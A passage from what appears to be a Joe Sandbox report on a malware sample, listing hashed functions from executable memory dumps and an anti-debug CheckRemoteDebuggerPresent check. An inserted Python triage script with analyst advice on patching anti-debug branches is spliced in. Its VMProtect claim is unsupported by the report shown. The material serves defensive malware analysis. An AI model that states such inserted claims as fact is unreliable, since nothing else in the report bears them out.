                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: bay|
                        • API String ID: 0-1580252715
                        • Opcode ID: 19d75963d4ab24087b11ad5b199e2a192efbca4a0a3bb46230f748ac2b3ee466
                        • Instruction ID: 2171a06ec14db425348a05bf279e51f87cc54db5e539987e19db69679b92debd
                        • Opcode Fuzzy Hash: 19d75963d4ab24087b11ad5b199e2a192efbca4a0a3bb46230f748ac2b3ee466
                        • Instruction Fuzzy Hash: BAC18072A087518FC364CE3DC94465AB7E1BF89610F0689AEE899DB364DB30DC05CF92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: bay|
                        • API String ID: 0-1580252715
                        • Opcode ID: 6a6a3181aafbb2306e926e4f04dcfbaea3447b74eb58bfcc182e5f41b5c690ce
                        • Instruction ID: 3909ef280b92ab63e84a9a98f75b281bcc1995dcf0559d1bbf4879827e88350f
                        • Opcode Fuzzy Hash: 6a6a3181aafbb2306e926e4f04dcfbaea3447b74eb58bfcc182e5f41b5c690ce
                        • Instruction Fuzzy Hash: 22A1C572B087518FC794CF6DC84465ABBE2BF89254F0649ADE899DB361DA30DC04CF92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: JZo+
                        • API String ID: 0-4196352523
                        • Opcode ID: 776e280f96124377b71609afd4733e7aa7b2a11e1b81228edf3ca29e93f34d94
                        • Instruction ID: dca30bf32499b5abe19fccf62aede691367539cb331b9fcf59655b56f1563280
                        • Opcode Fuzzy Hash: 776e280f96124377b71609afd4733e7aa7b2a11e1b81228edf3ca29e93f34d94
                        • Instruction Fuzzy Hash: F0512877F005254F8B54DBA9D8844AEB7E6FFD9260726816BD909E7361DA308C06C7D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: E&
                        • API String ID: 0-3842363111
                        • Opcode ID: 1c8fb0de1a52f35676876750ad6fd48c80c5e20425a4fce03355a183e4152ceb
                        • Instruction ID: 493cb27786dc0b6b38f37d9293e016ff9e6000e3a90c5f691f0701206664a8c1
                        • Opcode Fuzzy Hash: 1c8fb0de1a52f35676876750ad6fd48c80c5e20425a4fce03355a183e4152ceb
                        • Instruction Fuzzy Hash: 1F417276F106258FCB48DF69C845999B7F2BF88320B1681AAD819EB361DB34DC51CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ac6c8e5808b92ab16f9afc8550c376c9740276de4f7d1e07293ce4ff5999ae6b
                        • Instruction ID: 9bca1b91de4ee98b2f6b939f8cc61c513b6d4ff5411f9763d8032e15cf7854d2
                        • Opcode Fuzzy Hash: ac6c8e5808b92ab16f9afc8550c376c9740276de4f7d1e07293ce4ff5999ae6b
                        • Instruction Fuzzy Hash: 0312E5B0C817468BE334CF25E848184BBE0F7A5318B564B19D2A16B3D1D7B5396ECF85
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2d4a93ad67981d786b2a8ecac0bee20dfa17469c733bc40c474b89d1559a799a
                        • Instruction ID: 282ba6c582e11e2f1d6e0145a8b0c6b1864d3f710b47e2d376fbcecde3ab6de5
                        • Opcode Fuzzy Hash: 2d4a93ad67981d786b2a8ecac0bee20dfa17469c733bc40c474b89d1559a799a
                        • Instruction Fuzzy Hash: 8EA17D72A00209CFCF09DFB5C98559EB7B6FF84701B15856EE811AF261EB32E915CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1db909661eb682c67ae9cc47b3ec73a5223d0b98c0ecfaf427f882c2d1243db1
                        • Instruction ID: 79a750e789d144e01b4b3502e5bb291e6e080ff87c3425b3000ab5d98f7377d1
                        • Opcode Fuzzy Hash: 1db909661eb682c67ae9cc47b3ec73a5223d0b98c0ecfaf427f882c2d1243db1
                        • Instruction Fuzzy Hash: A7713476B001148FEB59EB6C985447EBBF2FF99220B1604BFE506E73B2DA348D058791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 84aef5ed07b36bee95ffa6fafb0e0ca7ad560bc1c30520791a0da1b205586886
                        • Instruction ID: 459127d6558ba3f41a7b0e29f809a6ad64a6cdaf1156b30c6138f03742e7f3c4
                        • Opcode Fuzzy Hash: 84aef5ed07b36bee95ffa6fafb0e0ca7ad560bc1c30520791a0da1b205586886
                        • Instruction Fuzzy Hash: 2E6136A3F1073547BB24886D8C9026BE6D1D75468879B0537EE0AFB361F9B1CC0587D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e61e003da52bb41d5c2f4701fdb779b12998a66236e98490db2e5ac2685ad5d
                        • Instruction ID: d7bce3d300976999ac66b07d29a5c946e42092f67436a1c7d34444d4dc71d12a
                        • Opcode Fuzzy Hash: 2e61e003da52bb41d5c2f4701fdb779b12998a66236e98490db2e5ac2685ad5d
                        • Instruction Fuzzy Hash: 1CC128B0C817468BE724CF25E848189BBB1FBA5318B164B19D2A16B3D1D7B4386ECF45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0cbf695edc01cc1d87f9cf689211b4a1d3b9716643a80d547b7ac6c6c0f1d11a
                        • Instruction ID: 111be42b9c00c4559490d376ea6c2ac79dfb654676263991e3ed61f365b771c7
                        • Opcode Fuzzy Hash: 0cbf695edc01cc1d87f9cf689211b4a1d3b9716643a80d547b7ac6c6c0f1d11a
                        • Instruction Fuzzy Hash: 0F51C572F006398BDB14DEADD48059EFBF6BB88350716856AE859EB340DA70DD05CBC0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:10.2%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:3
                        Total number of Limit Nodes:0
                        execution_graph 3813 7ff848357e31 3814 7ff848357e7e CheckRemoteDebuggerPresent 3813->3814 3816 7ff848357eef 3814->3816

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1017 7ff848357e31-7ff848357eed CheckRemoteDebuggerPresent 1020 7ff848357eef 1017->1020 1021 7ff848357ef5-7ff848357f38 1017->1021 1020->1021
                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.3241041169.00007FF848350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848350000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_7ff848350000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID: CheckDebuggerPresentRemote
                        • String ID:
                        • API String ID: 3662101638-0
                        • Opcode ID: 9964022e1362b9f4274dac7ef7697e867b1e22ffd6051e812419b81de611dcb6
                        • Instruction ID: 8a2a3f29b2aa406d5fb08982321434321ba6cccb4f097c86f8ab446fb0634de5
                        • Opcode Fuzzy Hash: 9964022e1362b9f4274dac7ef7697e867b1e22ffd6051e812419b81de611dcb6
                        • Instruction Fuzzy Hash: E731223190871C8FCB58DF58C88A7ED7BE0EF65321F0542ABD489D7292DB74A846CB91
                        Uniqueness

                        Uniqueness Score: -1.00%
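The execution graph and control-flow graph above record a CheckRemoteDebuggerPresent call at 7ff848357e7e whose result selects between two successor blocks, and every function in this listing was recovered from a memory dump that is executable, writable and not backed by a PE image (the unpacked code the VMProtect layer drops at runtime). The following Python script is an added example, not part of the Joe Sandbox report or product: it parses report lines of the shape shown above to group functions by dump region, ranks RWX non-PE regions as the ones to dump first, and flags anti-debug API calls in the graph lines together with their branch targets. The sdmp name layout beyond the process index, base address and protection field is an assumption, not something the page documents; the protection field is decoded with the standard winnt.h PAGE_* values.

```python
"""Triage helper for the per-function listing of a Joe Sandbox report.

Added example, not part of the report or of Joe Sandbox itself. Assumed
(undocumented on the page): the ``.sdmp`` name is laid out as
``<proc>.<dump>.<seq>.<base>.<protect>.<x>.<y>.<z>.sdmp``. Only ``proc``,
``base`` and ``protect`` are decoded; ``protect`` is read as a standard
Windows PAGE_* value (winnt.h), the remaining fields are kept opaque.
"""
import re

# winnt.h memory protection constants.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Win32 APIs that typically show up in anti-debug checks.
ANTI_ANALYSIS_APIS = {
    "CheckRemoteDebuggerPresent", "IsDebuggerPresent",
    "NtQueryInformationProcess", "OutputDebugStringA", "OutputDebugStringW",
}

SDMP_RE = re.compile(
    r"Source File:\s*(?P<proc>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.\d+\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})(?:\.[0-9A-Fa-f]{8}){3}\.sdmp"
    r".*based on PE:\s*(?P<pe>true|false)"
)


def parse_dump_sources(lines):
    """Group the report's 'Source File' lines by (process index, base address)."""
    summary = {}
    for line in lines:
        m = SDMP_RE.search(line)
        if not m:
            continue
        key = (int(m["proc"], 16), int(m["base"], 16))
        prot = int(m["prot"], 16) & 0xFF
        entry = summary.setdefault(key, {
            "protect": PAGE_PROTECT.get(prot, hex(prot)),
            "based_on_pe": m["pe"].lower() == "true",
            "functions": 0,
        })
        entry["functions"] += 1
    return summary


def unpacked_code_regions(summary):
    """Regions that are executable+writable and not backed by a PE image:
    this is where unpacked or decrypted code lands, so dump them first."""
    return sorted(k for k, v in summary.items()
                  if v["protect"] == "PAGE_EXECUTE_READWRITE" and not v["based_on_pe"])


def parse_graph(line):
    """Parse an 'execution_graph' / 'control_flow_graph' line into nodes and edges.

    Token layout assumed from the page: <graph name>, then repeated
    '<id> <addr or addr-addr> [API ...]' groups and '<src>-><dst>' edges.
    Node ids are decimal; addresses are hex and never all-decimal here."""
    tokens = line.split()
    name, nodes, edges, node_id = tokens[0], {}, [], None
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:
            src, dst = tok.split("->")
            edges.append((int(src), int(dst)))
            i += 1
        elif tok.isdigit():
            node_id = int(tok)
            nodes[node_id] = {"addr": tokens[i + 1], "apis": []}
            i += 2
        else:  # an API name belongs to the most recently opened node
            nodes[node_id]["apis"].append(tok)
            i += 1
    return name, nodes, edges


def anti_analysis_calls(line):
    """Return (address, API, successor ids) for anti-debug APIs in a graph line.
    The successors are the blocks the check can branch to."""
    _, nodes, edges = parse_graph(line)
    hits = []
    for nid, node in nodes.items():
        for api in node["apis"]:
            if api in ANTI_ANALYSIS_APIS:
                targets = sorted(dst for src, dst in edges if src == nid)
                hits.append((node["addr"], api, targets))
    return hits


# Constructed sample: lines copied from the report entries above.
REPORT_LINES = [
    "Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false",
    "Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false",
    "Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false",
    "Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false",
    "Source File: 00000002.00000002.3241041169.00007FF848350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848350000, based on PE: false",
    "Source File: 00000007.00000002.2184494585.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false",
]
EXEC_GRAPH = ("execution_graph 3813 7ff848357e31 3814 7ff848357e7e "
              "CheckRemoteDebuggerPresent 3813->3814 3816 7ff848357eef 3814->3816")
CFG = ("control_flow_graph 1017 7ff848357e31-7ff848357eed CheckRemoteDebuggerPresent "
       "1020 7ff848357eef 1017->1020 1021 7ff848357ef5-7ff848357f38 1017->1021 1020->1021")

if __name__ == "__main__":
    summary = parse_dump_sources(REPORT_LINES)
    for (proc, base), info in sorted(summary.items()):
        print(f"proc {proc} base {base:#x}: {info}")
    print("dump first:", [f"{p}:{b:#x}" for p, b in unpacked_code_regions(summary)])
    print("anti-debug:", anti_analysis_calls(CFG))
```

Run it on the full report text (one line per list element) instead of the constructed sample to get the complete region table; a region with many functions, PAGE_EXECUTE_READWRITE and based on PE: false is the dump to carve and load into IDA, and each anti-debug hit gives the address to patch or the branch to force when the sample refuses to run under a debugger.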

                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2184494585.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID: M_^$M_^
                        • API String ID: 0-615062493
                        • Opcode ID: bfae76d42550f169ebd24105660dc88ae3e5f16c9e70002c49bd28b24acda257
                        • Instruction ID: c1443cb9e2a6ceb48c9e159a44db3a36b132420a09edc474fe2ea525f6050fa6
                        • Opcode Fuzzy Hash: bfae76d42550f169ebd24105660dc88ae3e5f16c9e70002c49bd28b24acda257
                        • Instruction Fuzzy Hash: ABC2E375E092698FDB68DF58D8917ECB7B1EB48344F1481EAD40EA7381DB34AE818F44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.2184494585.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 95a88e2fda7a271a9a6b442856059194f47df50548424e8eaf14f1af14cc8926
                        • Instruction ID: bb0c877c7ba34fb2b9756c6856de166d721afcfb26d6c5ebba99113c4c4a422f
                        • Opcode Fuzzy Hash: 95a88e2fda7a271a9a6b442856059194f47df50548424e8eaf14f1af14cc8926
                        • Instruction Fuzzy Hash: E232D574E192198FDB68DF68C8917EDB7B1EF48344F1481A9E50EA7381DB34AE818F44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.2184494585.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e83b6491833518580557890e3372d2ec1f01a234268462029460e009ca58e603
                        • Instruction ID: 323ad5dc0052c473fad0cb52905b12ae1b0c2e53ae890ff4c27a39d3960afd5c
                        • Opcode Fuzzy Hash: e83b6491833518580557890e3372d2ec1f01a234268462029460e009ca58e603
                        • Instruction Fuzzy Hash: 9E029031B1C90A4FE758EB28D46567D73D2EF88784F688579D10EC32D6CE78AC428745
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.2184494585.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b976a243492f459debf8a1cba953c18d0260a3582a26b96f0e89ad1406a11edc
                        • Instruction ID: 2806168a4fde356dcb32f567a3daf24eec9306a3f87efb06bc7d6c60db7ec6d7
                        • Opcode Fuzzy Hash: b976a243492f459debf8a1cba953c18d0260a3582a26b96f0e89ad1406a11edc
                        • Instruction Fuzzy Hash: 4331463294D2850FD755A7306C138E63FA4EB42368F0A41ABE459CB4A3DA1CD687C762
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.2184494585.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ccb4ad689c4b5ef6eba2dc954244c44a0fbb4cf415d94e7ab9498e91deeed9a6
                        • Instruction ID: 63eb32c4ec9a500e55b51514890ad64608c8fa37e1db08ee434dcc02694a4a69
                        • Opcode Fuzzy Hash: ccb4ad689c4b5ef6eba2dc954244c44a0fbb4cf415d94e7ab9498e91deeed9a6
                        • Instruction Fuzzy Hash: 7621F97288E2911FD356A3306C538F23FA4CF42269B0E41E7E099CB4A3D50D9687C766
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.2184494585.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1fad236ba2ae7130faa91d4faabfbe8f16482181205728f7746925755daa1601
                        • Instruction ID: 21620ae34b4e060c5a08d4d1d3e6d9d94ea4cfdf4a6452ddeda710b210e5f7bb
                        • Opcode Fuzzy Hash: 1fad236ba2ae7130faa91d4faabfbe8f16482181205728f7746925755daa1601
                        • Instruction Fuzzy Hash: 4B214C32E1D98E8FEB84FB68D8611FDBBB1EF54354F4441B6D409E3292DE2858419784
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2347155550.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID: M_^$M_^
                        • API String ID: 0-615062493
                        • Opcode ID: 9ec1ff7acbdbf45e7f5524f02203b377397f5bc824049017d57c98f49d875976
                        • Instruction ID: 26191d8ae96a8a3a2d0fafddbf17115dc6991036af7395f7e34d5713c03f4f55
                        • Opcode Fuzzy Hash: 9ec1ff7acbdbf45e7f5524f02203b377397f5bc824049017d57c98f49d875976
                        • Instruction Fuzzy Hash: 7AC2D375E092698FDB68DF58C8917ECB7B1EB48344F1481EAD40EA7391DB34AE818F44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.2347155550.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4e453e578a4e559e9c0247ae3d3a7a9ffee7558702e6879e825dd7d940a0b931
                        • Instruction ID: b7dcfde2812bf28398f8bf600c8a7dbe52bd2cefde7efb816428d4cb849b27bb
                        • Opcode Fuzzy Hash: 4e453e578a4e559e9c0247ae3d3a7a9ffee7558702e6879e825dd7d940a0b931
                        • Instruction Fuzzy Hash: 9632E675E192198FDB68DF68C8917ECB7B1EB48344F1481A9E40EA7385DB34AE818F44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.2347155550.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d2f8665ad9901dc338b03cf7df1cfcd4318043ed874eed6ff0c3fa7cb1a8ff17
                        • Instruction ID: fc1da616487484161f3c0a431656019514043869d9980b9bb49fc2d23ebba590
                        • Opcode Fuzzy Hash: d2f8665ad9901dc338b03cf7df1cfcd4318043ed874eed6ff0c3fa7cb1a8ff17
                        • Instruction Fuzzy Hash: E702C231B1C90A4FE758EB28C46567D72D2EF88784F688579E40EC73D6CE68AC428745
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.2347155550.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0b079194570dcee26dec96ba5b29e0f89eb24f550ea6fb749f683a3d56b2d77f
                        • Instruction ID: 0dac5400f0bde08fe9989216c943966509d1ff6ddd08e1251e5b7b6f9990da03
                        • Opcode Fuzzy Hash: 0b079194570dcee26dec96ba5b29e0f89eb24f550ea6fb749f683a3d56b2d77f
                        • Instruction Fuzzy Hash: C731463294D2850FD755A7306C138E63FA4EB42368F0941ABE459CB4A3DA1CD697C762
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.2347155550.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cababdc6f34613da81b7978c1c7397cd8aaf2d2d0f5c08c040c83988ee1ff154
                        • Instruction ID: c6cfa5ae550cb06c63ed7c04d7f52b4a6fba1d28978080c4ae8bc30ef679664f
                        • Opcode Fuzzy Hash: cababdc6f34613da81b7978c1c7397cd8aaf2d2d0f5c08c040c83988ee1ff154
                        • Instruction Fuzzy Hash: A821273288E2910FD356A7302C538F63FA4CF42269B0E41E7E499CB8A3D50D9687C362
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.2347155550.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 64db149c2e4dc8b9f2eee1d20d824bef0443ef4b86620bbb02adce57e8ee2191
                        • Instruction ID: 5a8f6494c817efb28078ada3c1221af2fdb525249a371eaba60640af17ea9b1e
                        • Opcode Fuzzy Hash: 64db149c2e4dc8b9f2eee1d20d824bef0443ef4b86620bbb02adce57e8ee2191
                        • Instruction Fuzzy Hash: 4E218F32E1994E8FEB84FB6898611FDBBB1FF44354F4440B6C409E32D6DE2858419784
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2428740075.00007FF848360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ff848360000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID: N_^$N_^
                        • API String ID: 0-386383641
                        • Opcode ID: 0d2ef27a96c8729b9997d43cd75ac9a8cd3eb597aae3946d30cf525876d2aaaa
                        • Instruction ID: bb5e4599a7b0c29b8d2dc35091b95f834a0244acfef2eed8aa4c2e2be22af816
                        • Opcode Fuzzy Hash: 0d2ef27a96c8729b9997d43cd75ac9a8cd3eb597aae3946d30cf525876d2aaaa
                        • Instruction Fuzzy Hash: 87C2C274E092298FDB68DF58D8A16ECB7B1EB48344F1441EAD44EA7391DB34AE81CF44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000009.00000002.2428740075.00007FF848360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ff848360000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 56359824249567881347ca43832221b98c101a9f81b89696cdef2e2fbf9bb5e6
                        • Instruction ID: aa02d35d053bed7219c4c059c3470332885e28d464218c80a958b717d3b1fdd7
                        • Opcode Fuzzy Hash: 56359824249567881347ca43832221b98c101a9f81b89696cdef2e2fbf9bb5e6
                        • Instruction Fuzzy Hash: 2932C574E092198FDB68DF68C8957ECB7B1EF88344F1441A9E50EA7385DB346E818F44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000009.00000002.2428740075.00007FF848360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ff848360000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
